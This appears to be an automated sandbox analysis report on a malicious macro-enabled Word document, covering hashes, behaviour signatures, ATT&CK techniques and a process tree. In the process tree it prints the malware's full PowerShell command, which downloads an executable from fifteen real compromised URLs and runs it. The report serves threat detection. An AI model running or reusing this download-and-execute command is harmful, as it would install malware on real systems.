Analysis

  • max time kernel
    104s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 03:39

General

  • Target

    DieKlage-01092020-1994462004.docm

  • Size

    90KB

  • MD5

    09c2efc28d71216d95c49b33f24af6e3

  • SHA1

    b8b3a9a39486c91222494004ef2498e977ad7524

  • SHA256

    94027e02da7382882c8046e165ba9bdf7b3fc801ecf35ab3f004b1a3fdcc743c

  • SHA512

    be8158bcb2a6adccffd5d5486b0d4c51463df654d017e0ca58466a9d46c9c23a9811200779333d803933c402c8f660200db1e7c5c89796c83e1c4f3ed9ab67a3

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DieKlage-01092020-1994462004.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3092
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1988
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:544
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery
    • Query Registry (3): T1012
    • System Information Discovery (4): T1082


Downloads

  • C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd
    Filesize

    24KB

    MD5

    db94c28610cb83c3056f1ae4e3e80463

    SHA1

    174cb2cc87ff32c50b752a94eda80121811014bd

    SHA256

    72223739a61890dac3cef9147aaa16b447d977cdf6ee413535a2826931db2b2d

    SHA512

    f94ec877c58b4c5aa503e2fff42deb8925c17d7fddbf4d10e4856b2254dc81117d0f9a1ec21ed4444a3e90d2c28e86fd1e776448f3aa80cb8977ca7021cb85e9

  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    Filesize

    74KB

    MD5

    5ba27fb265515da4386aa9c025826e3a

    SHA1

    16a4dfd513bd36714e560a3fcca8c3b846e2da57

    SHA256

    f9655447610215ddd56d097ea5bdeaaa1f7a730d66945c0cc86d8de51c5bb15e

    SHA512

    977e4954d5ec90f2306d34f95fc4898e1309f1272306c3e70616738ef49eb1f53b8689580d8ddffa677f02b68ba90ef4f0ad45456a4e27ac9367f284823819b3
